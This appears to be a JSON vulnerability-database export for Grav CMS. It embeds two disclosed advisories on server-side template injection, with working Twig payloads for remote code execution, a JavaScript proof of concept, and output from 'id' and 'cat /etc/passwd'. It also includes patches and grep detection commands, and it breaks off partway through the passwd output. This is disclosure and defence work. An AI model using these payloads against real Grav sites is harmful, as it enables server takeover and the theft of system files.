E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-18T21:38:33Z/"}],"url":"https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8"},{"reference_url":"https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-whr7-m3f8-mpm8","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-18T21:38:33Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-whr7-m3f8-mpm8"},{"reference_url":"https://github.com/twigphp/Twig/blob/v1.44.7/src/Environment.php#L148","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-18T21:38:33Z/"}],"url":"https://github.com/twigphp/Twig/blob/v1.44.7/src/Environment.php#L148"},{"reference_url":"https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66"},{"reference_url":"https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-18T21:38:33Z/"}],"url":"https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-34448","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-34448"},{"reference_url":"https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-18T21:38:33Z/"}],"url":"https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83"},{"reference_url":"https://github.com/advisories/GHSA-whr7-m3f8-mpm8","reference_id":"GHSA-whr7-m3f8-mpm8","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-whr7-m3f8-mpm8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/72011?format=json","purl":"pkg:composer/getgrav/grav@1.7.42","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-13tt-ebbj-eyg8"},{"vulnerability":"VCID-19e3-3agd-bbc8"},{"vulnerability":"VCID-1gzk-uead-q7ch"},{"vulnerability":"VCID-1kvz-tbnw-dyev"},{"vulnerability":"VCID-2fzp-f93m-afe3"},{"vulnerability":"VCID-31dk-jdqj-pfag"},{"vulnerability":"VCID-47rc-kqnw-7ue8"},{"vulnerability":"VCID-6gtj-f6gc-d3bf"},{"vulnerability":"VCID-91ht-8cax-7kdr"},{"vulnerability":"VCID-9h5a-h26f-cudw"},{"vulnerability":"VCID-9h65-8eka-quhd"},{"vulnerability":"VCID-bdnj-twfh-subp"},{"vulnerability":"VCID-bttg-w7fp-ybd2"},{"vulnerability":"VCID-dmbe-mmj8-3baa"},{"vulnerability":"VCID-dmh7-xvmg-27ef"},{"vulnerability":"VCID-dzhh-3xxa-1ycf"},{"vulnerability":"VCID-euf5-wt5v-fqaf"},{"vulnerability":"VCID-f8zy-fcfc-tfdc"},{"vulnerability":"VCID-fg9g-7eg3-7ygr"},{"vulnerability":"VCID-g8rq-2ss6-3kcu"},{"vulnerability":"VCID-gcpb-7cu7-q3as"},{"vulnerability":"VCID-hdsp-4e4r-c3fh"},{"vulnerability":"VCID-hwcx-1fp9-3bhh"},{"vulnerability":"VCID-ng3h-ees8-vubs"},{"vulnerability":"VCID-p24p-fcpe-xbah"},{"vulnerability":"VCID-rurt-s65k-1yfk"},{"vulnerability":"VCID-swcx-dmqn-2yf9"},{"vulnerability":"VCID-t3bt-hrw2-jya3"},{"vulnerability":"VCID-ugn8-e63y-1fes"},{"vulnerability":"VCID-v5ah-z3uv-fbet"},{"vulnerability":"VCID-vp4w-2f8d-vfcf"},{"vulnerability":"VCID-xe66-6nav-c7gy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.42"}],"aliases":["CVE-2023-34448","GHSA-whr7-m3f8-mpm8"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ppnh-1zmd-t3c5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/38772?format=json","vulnerability_id":"VCID-q9c3-abt1-2kdf","summary":"Grav Server-side Template Injection (SSTI) via Twig Default Filters\nHi,\n\nactually we have sent the bug report to [security@getgrav.org](mailto:security@getgrav.org) on 27th March 2023 and on 10th April 2023.\n\n# Grav Server-side Template Injection (SSTI) via Insufficient Validation in filterFilter\n\n## Summary: \n| **Product** | Grav CMS |\n| ----------------------- | --------------------------------------------- |\n| **Vendor** | Grav |\n| **Severity** | High - Users with login access to Grav Admin panel and page creation/update permissions are able to obtain remote code/command execution |\n| **Affected Versions** | <= [v1.7.40](https://github.com/getgrav/grav/tree/1.7.40) (Commit [685d762](https://github.com/getgrav/grav/commit/685d76231a057416651ed192a6a2e83720800e61)) (Latest version as of writing) |\n| **Tested Versions** | v1.7.40 |\n| **Internal Identifier** | STAR-2023-0007 |\n| **CVE Identifier** | TBD |\n| **CWE(s)** | CWE-20: Improper Input Validation, CWE-1336: Improper Neutralization of Special Elements Used in a Template Engine |\n\n## CVSS3.1 Scoring System: \n**Base Score:** 7.2 (High) \n**Vector String:** `CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H` \n| **Metric** | **Value** |\n| ---------------------------- | --------- |\n| **Attack Vector (AV)** | Network |\n| **Attack Complexity (AC)** | Low |\n| **Privileges Required (PR)** | High |\n| **User Interaction (UI)** | None |\n| **Scope (S)** | Unchanged |\n| **Confidentiality \\(C)** | High |\n| **Integrity (I)** | High |\n| **Availability (A)** | High |\n\n## Product Overview: \nGrav is a PHP-based flat-file content management system (CMS) designed to provide a fast and simple way to build websites. It supports rendering of web pages written in Markdown and Twig expressions, and provides an administration panel to manage the entire website via an optional Admin plugin.\n\n## Vulnerability Summary: \nThere is a logic flaw in the `GravExtension.filterFilter()` function whereby validation against a denylist of unsafe functions is only performed when the argument passed to filter is a string. However, passing an array as a callable argument allows the validation check to be skipped. Consequently, a low privileged attacker with login access to Grav Admin panel and page creation/update permissions is able to inject malicious templates to obtain remote code execution.\n\n## Vulnerability Details: \nThe vulnerability can be found in the `GravExtension.filterFilter()` function declared in [`/system/src/Grav/Common/Twig/Extension/GravExtension.php`](https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Twig/Extension/GravExtension.php#L1692-L1698):\n~~~php\n...\nclass GravExtension extends AbstractExtension implements GlobalsInterface\n{\n ...\n \n /**\n * Return a list of all filters.\n *\n * @return array\n */\n public function getFilters(): array\n {\n return [\n ...\n \n // Security fix\n new TwigFilter('filter', [$this, 'filterFilter'], ['needs_environment' => true]),\n ];\n }\n\n ...\n\n /**\n * @param Environment $env\n * @param array $array\n * @param callable|string $arrow\n * @return array|CallbackFilterIterator\n * @throws RuntimeError\n */\n function filterFilter(Environment $env, $array, $arrow)\n {\n if (is_string($arrow) && Utils::isDangerousFunction($arrow)) { // [1]\n throw new RuntimeError('Twig |filter(\"' . $arrow . '\") is not allowed.');\n }\n\n return \\twig_array_filter($env, $array, $arrow); // [2]\n }\n}\n~~~\n\nAt [1], the `$arrow` parameter contains the argument supplied to the filter. For example, it may refer to `\"funcname\"` in `{{ array|filter(\"funcname\") }}` or the closure (a.k.a. arrow function) `el => el != 'exclude'` in `{{ array|filter(el => el != 'exclude') }}`. Observe that `Utils::isDangerousFunction($arrow)` is only invoked if `$arrow` is a string. As such, non-string arguments may be passed to `twig_array_filter()` at [2] due to the absence of type enforcement at [1].\n\nThe implementation of the `twig_array_filter()` function can be found in [/src/Extension/CoreExtension.php](https://github.com/twigphp/Twig/blob/v1.44.7/src/Extension/CoreExtension.php) within Twig's codebase:\n~~~php\nfunction twig_array_filter(Environment $env, $array, $arrow)\n{\n if (!twig_test_iterable($array)) {\n throw new RuntimeError(sprintf('The \"filter\" filter expects an array or \"Traversable\", got \"%s\".', \\is_object($array) ? \\get_class($array) : \\gettype($array)));\n }\n\n if (!$arrow instanceof Closure && $env->hasExtension('\\Twig\\Extension\\SandboxExtension') && $env->getExtension('\\Twig\\Extension\\SandboxExtension')->isSandboxed()) { // [3]\n throw new RuntimeError('The callable passed to \"filter\" filter must be a Closure in sandbox mode.');\n }\n\n if (\\is_array($array)) {\n if (\\PHP_VERSION_ID >= 50600) {\n return array_filter($array, $arrow, \\ARRAY_FILTER_USE_BOTH); // [4]\n }\n\n return array_filter($array, $arrow);\n }\n\n // the IteratorIterator wrapping is needed as some internal PHP classes are \\Traversable but do not implement \\Iterator\n return new \\CallbackFilterIterator(new \\IteratorIterator($array), $arrow);\n}\n~~~\n\nAt [3], a runtime error is thrown if `$arrow` is not a closure and Twig sandbox is enabled. However, since Grav does not use the Twig Sandbox extension, the check passes successfully even when `$arrow` is not a closure. Subsequently at [4], `array_filter()` is invoked with the user-controlled `$array` input and `$arrow` parameter.\n\nNote that the method signature of `array_filter()` is as follows:\n~~~php\narray_filter(array $array, ?callable $callback = null, int $mode = 0): array\n~~~\n\nA common mistake that developers make is assuming that the `callable` type refers to a `string` type. This is untrue, and it is [well documented in the PHP Manual](https://www.php.net/manual/en/language.types.callable.php):\n> A method of an instantiated object is passed as an **array containing an object at index 0 and the method name at index 1**. Accessing protected and private methods from within a class is allowed.\n> Static class methods can also be passed without instantiating an object of that class by either, **passing the class name instead of an object at index 0, or passing `ClassName::methodName`**.\n\nThis means that all of the following method calls are valid:\n~~~php\n// Type 1: Simple callback -- invokes system(\"id\")\narray_filter(array(\"id\"), \"system\");\n\n// Type 2: Static class method call -- invokes Class::staticMethod($arg)\narray_filter(array($arg), array(\"Class\", \"staticMethod\"));\narray_filter(array($arg), array(\"Class::staticMethod\")); // same as above\n\n// Type 3: Object method call -- invokes $obj->method($arg)\narray_filter(array($arg), array($obj, \"method\"));\n~~~\n\nGoing back to [1], if `$arrow` is an `array` instead of a `string` or `closure`, the validation check to prevent invocation of unsafe functions is completely skipped. Multiple static class methods within Grav's codebase and its dependencies were found to be suitable gadgets for achieving for remote code execution:\n~~~twig\n// Gadget 1: Using \\Grav\\Common\\Utils::arrayFilterRecursive() within Grav's codebase to invoke system(\"id\"):\n{% set id = {'id': 0} %}\n{{ {'system': id} | filter('\\\\Grav\\\\Common\\\\Utils', 'arrayFilterRecursive') }}\n\n// Gadget 2: Using \\Symfony\\Component\\VarDumper\\Vardumper::setHandler() and \\Symfony\\Component\\VarDumper\\Vardumper::dump() to invoke system(\"id\"):\n{{ ['system'] | filter(['\\\\Symfony\\\\Component\\\\VarDumper\\\\VarDumper', 'setHandler'])}}\n{{ ['id'] | filter(['\\\\Symfony\\\\Component\\\\VarDumper\\\\VarDumper', 'dump']) }}\n\n// Gadget 3: Using \\RocketTheme\\Toolbox\\File\\File::instance() in Grav's default theme to perform arbitrary file write to rce.php in the webroot:\n{{ (['rce.php'] | map(['\\\\RocketTheme\\\\Toolbox\\\\File\\\\File', 'instance']))[0].save('<?php echo phpinfo(); ') }}\n\n// Gadget 4: Using \\Symfony\\Component\\Process\\Process::fromShellCommandline() to invoke system(\"id\"):\n{{ {'/':'sleep 3'} | map(['\\\\Symfony\\\\Component\\\\Process\\\\Process', 'fromShellCommandline']) | map(e => e.run()) | print_r }}\n~~~\n\n## Exploit Conditions: \nThis vulnerability can be exploited if the attacker has access to:\n1. an administrator account, or\n2. a non-administrator, user account that are granted the following permissions:\n - login access to Grav admin panel, and\n - page creation or update rights\n\n## Reproduction Steps: \n1. Log in to Grav Admin using an administrator account.\n2. Navigate to `Accounts > Add`, and ensure that the following permissions are assigned when creating a new low-privileged user:\n * Login to Admin - Allowed\n * Page Update - Allowed\n3. Log out of Grav Admin, and log back in using the account created in step 2.\n4. Navigate to `http://<grav_installation>/admin/pages/home`.\n5. Click the `Advanced` tab and select the checkbox beside `Twig` to ensure that Twig processing is enabled for the modified webpage.\n6. Under the `Content` tab, insert the following payload within the editor:\n ~~~twig\n // Gadget 1: Using \\Grav\\Common\\Utils::arrayFilterRecursive() within Grav's codebase to invoke system(\"id\"):\n {% set id = {'id': 0} %}\n {{ {'system': id} | filter('\\\\Grav\\\\Common\\\\Utils', 'arrayFilterRecursive') }}\n ~~~\n7. Click the Preview button. Observe that the output of the `id` shell command is returned in the preview.\n\n## Suggested Mitigations: \nPatch the logic flaw in the `GravExtension.filterFilter()` function declared in `/system/src/Grav/Common/Twig/Extension/GravExtension.php` to ensure that the `$arrow` paramater passed to the `filterFilter()` function must either be a `string` or an arrow function as such:\n~~~diff php\n...\nclass GravExtension extends AbstractExtension implements GlobalsInterface\n{\n ...\n\n /**\n * @param Environment $env\n * @param array $array\n * @param callable|string $arrow\n * @return array|CallbackFilterIterator\n * @throws RuntimeError\n */\n function filterFilter(Environment $env, $array, $arrow)\n {\n- if (is_string($arrow) && Utils::isDangerousFunction($arrow)) {\n+ if (!$arrow instanceof Closure && !is_string($arrow) || Utils::isDangerousFunction($arrow)) {\n throw new RuntimeError('Twig |filter(\"' . $arrow . '\") is not allowed.');\n }\n\n return \\twig_array_filter($env, $array, $arrow);\n }\n}\n~~~\n\n`Utils::isDangerousFunction()` in [/system/src/Grav/Common/Utils.php](https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1956-L2074) should also be patched to prevent static class methods from being invoked. For example,\n~~~diff php\n...\nabstract class Utils\n{\n ...\n /**\n * @param string $name\n * @return bool\n */\n public static function isDangerousFunction(string $name): bool\n {\n ...\n\n+ if (is_array($name) || strpos($name, \":\") !== false) {\n+ return false;\n+ }\n\n if (in_array($name, $commandExecutionFunctions)) {\n return true;\n }\n\n if (in_array($name, $codeExecutionFunctions)) {\n return true;\n }\n\n if (isset($callbackFunctions[$name])) {\n return true;\n }\n\n if (in_array($name, $informationDiscosureFunctions)) {\n return true;\n }\n\n if (in_array($name, $otherFunctions)) {\n return true;\n }\n\n return static::isFilesystemFunction($name);\n }\n ...\n}\n~~~\n\nEnd users should also ensure that `twig.undefined_functions` and `twig.undefined_filters` properties in `/path/to/webroot/system/config/system.yaml` configuration file are set to `false` to disallow Twig from treating undefined filters/functions as PHP functions and executing them.\n\n## Detection Guidance: \nThe following strategies may be used to detect potential exploitation attempts.\n1. Searching within Markdown pages using the following shell command: \n `grep -Priz -e '\\|\\s*(filter|map|reduce)\\s*\\(' /path/to/webroot/user/pages/`\n2. Searching within Doctrine cache data using the following shell command: \n `grep -Priz -e '\\|\\s*(filter|map|reduce)\\s*\\(' --include '*.doctrinecache.data' /path/to/webroot/cache/`\n3. Searching within Twig cache using the following shell command: \n `grep -Priz -e 'twig_array_(filter|map|reduce)' /path/to/webroot/cache/twig/`\n4. Searching within compiled Twig template files using the following shell command: \n `grep -Priz -e '\\|\\s*(filter|map|reduce)\\s*\\(' /path/to/webroot/cache/compiled/files/`\n\nNote that it is not possible to detect indicators of compromise reliably using the Grav log file (located at `/path/to/webroot/logs/grav.log` by default), as successful exploitation attempts do not generate any additional logs. However, it is worthwhile to examine any PHP errors or warnings logged to determine the existence of any failed exploitation attempts.\n\n## Credits: \nNgo Wei Lin ([@Creastery](https://twitter.com/Creastery)) & Wang Hengyue ([@w_hy_04](https://twitter.com/w_hy_04)) of STAR Labs SG Pte. Ltd. ([@starlabs_sg](https://twitter.com/starlabs_sg))\n\nKindly note that STAR Labs reserved and assigned the following CVE identifiers to the respective vulnerabilities presented in this report: \n1. **CVE-2023-30595**\n Server-side Template Injection (SSTI) in getgrav/grav <= v1.7.40 allows Grav Admin users with page creation or update rights to bypass the dangerous functions denylist check in `GravExtension.filterFilter()` and to achieve remote code execution via usage of fully-qualified names, supplied as arrays of strings, when referencing callables. This is a bypass of CVE-2022-2073.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-34252","reference_id":"","reference_type":"","scores":[{"value":"0.00529","scoring_system":"epss","scoring_elements":"0.67457","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-34252"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Twig/Extension/GravExtension.php#L1692-L1698","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-12-18T19:02:44Z/"}],"url":"https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Twig/Extension/GravExtension.php#L1692-L1698"},{"reference_url":"https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1956-L2074","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-12-18T19:02:44Z/"}],"url":"https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1956-L2074"},{"reference_url":"https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-12-18T19:02:44Z/"}],"url":"https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec"},{"reference_url":"https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b"},{"reference_url":"https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8"},{"reference_url":"https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-96xv-rmwj-6p9w","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-12-18T19:02:44Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-96xv-rmwj-6p9w"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-34252","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-34252"},{"reference_url":"https://github.com/advisories/GHSA-96xv-rmwj-6p9w","reference_id":"GHSA-96xv-rmwj-6p9w","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-96xv-rmwj-6p9w"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/72011?format=json","purl":"pkg:composer/getgrav/grav@1.7.42","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-13tt-ebbj-eyg8"},{"vulnerability":"VCID-19e3-3agd-bbc8"},{"vulnerability":"VCID-1gzk-uead-q7ch"},{"vulnerability":"VCID-1kvz-tbnw-dyev"},{"vulnerability":"VCID-2fzp-f93m-afe3"},{"vulnerability":"VCID-31dk-jdqj-pfag"},{"vulnerability":"VCID-47rc-kqnw-7ue8"},{"vulnerability":"VCID-6gtj-f6gc-d3bf"},{"vulnerability":"VCID-91ht-8cax-7kdr"},{"vulnerability":"VCID-9h5a-h26f-cudw"},{"vulnerability":"VCID-9h65-8eka-quhd"},{"vulnerability":"VCID-bdnj-twfh-subp"},{"vulnerability":"VCID-bttg-w7fp-ybd2"},{"vulnerability":"VCID-dmbe-mmj8-3baa"},{"vulnerability":"VCID-dmh7-xvmg-27ef"},{"vulnerability":"VCID-dzhh-3xxa-1ycf"},{"vulnerability":"VCID-euf5-wt5v-fqaf"},{"vulnerability":"VCID-f8zy-fcfc-tfdc"},{"vulnerability":"VCID-fg9g-7eg3-7ygr"},{"vulnerability":"VCID-g8rq-2ss6-3kcu"},{"vulnerability":"VCID-gcpb-7cu7-q3as"},{"vulnerability":"VCID-hdsp-4e4r-c3fh"},{"vulnerability":"VCID-hwcx-1fp9-3bhh"},{"vulnerability":"VCID-ng3h-ees8-vubs"},{"vulnerability":"VCID-p24p-fcpe-xbah"},{"vulnerability":"VCID-rurt-s65k-1yfk"},{"vulnerability":"VCID-swcx-dmqn-2yf9"},{"vulnerability":"VCID-t3bt-hrw2-jya3"},{"vulnerability":"VCID-ugn8-e63y-1fes"},{"vulnerability":"VCID-v5ah-z3uv-fbet"},{"vulnerability":"VCID-vp4w-2f8d-vfcf"},{"vulnerability":"VCID-xe66-6nav-c7gy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.42"}],"aliases":["CVE-2023-34252","GHSA-96xv-rmwj-6p9w"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-q9c3-abt1-2kdf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/38779?format=json","vulnerability_id":"VCID-rs42-h8k4-zydz","summary":"Grav Server Side Template Injection (SSTI) vulnerability\n### Summary\nI found an RCE(Remote Code Execution) by SSTI in the admin screen.\n\n### Details\nRemote Code Execution is possible by embedding malicious PHP code on the administrator screen by a user with page editing privileges.\n\n### PoC\n1. Log in to the administrator screen and access the edit screen of the default page \"Typography\". (`http://127.0.0.1:8000/admin/pages/typography`)\n2. Open the browser's console screen and execute the following JavaScript code to confirm that an arbitrary command (`id`) is being executed.\n```js\n(async () => {\n const nonce = document.querySelector(\"input[name=admin-nonce]\").value;\n const id = document.querySelector(\"input[name=__unique_form_id__]\").value;\n\n const payload = \"{{['id']|map('system')|join}}\"; // SSTI Payload\n\n const params = new URLSearchParams();\n params.append(\"task\", \"save\");\n params.append(\"data[header][title]\", \"poc\");\n params.append(\"data[content]\", payload);\n params.append(\"data[folder]\", \"poc\");\n params.append(\"data[route]\", \"\");\n params.append(\"data[name]\", \"default\");\n params.append(\"data[header][body_classes]\", \"\");\n params.append(\"data[ordering]\", 1);\n params.append(\"data[order]\", \"\");\n params.append(\"toggleable_data[header][process]\", \"on\");\n params.append(\"data[header][process][twig]\", 1);\n params.append(\"data[header][order_by]\", \"\");\n params.append(\"data[header][order_manual]\", \"\");\n params.append(\"data[blueprint\", \"\");\n params.append(\"data[lang]\", \"\");\n params.append(\"_post_entries_save\", \"edit\");\n params.append(\"__form-name__\", \"flex-pages\");\n params.append(\"__unique_form_id__\", id);\n params.append(\"admin-nonce\", nonce);\n\n await fetch(\"http://127.0.0.1:8000/admin/pages/typography\", {\n method: \"POST\",\n headers: {\n \"content-type\": \"application/x-www-form-urlencoded\",\n },\n body: params,\n });\n\n window.open(\"http://127.0.0.1:8000/admin/pages/poc/:preview\");\n})();\n```\n\n#### Execution Result\n- Payload: `{{['id']|map('system')|join}}`\n```sh\nuid=501(<user_name>) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae) uid=501(<user_name>) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae)\n```\n- Payload: `{{['cat /etc/passwd']|map('system')|join}}`\n```sh\n## # User Database # # Note that this file is consulted directly only when the system is running # in single-user mode. At other times this information is provided by # Open Directory. # # See the opendirectoryd(8) man page for additional information about # Open Directory. ## nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false root:*:0:0:System Administrator:/var/root:/bin/sh daemon:*:1:1:System Services:/var/root:/usr/bin/false _uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico _taskgated:*:13:13:Task Gate Daemon:/var/empty:/usr/bin/false _networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false _installassistant:*:25:25:Install Assistant:/var/empty:/usr/bin/false 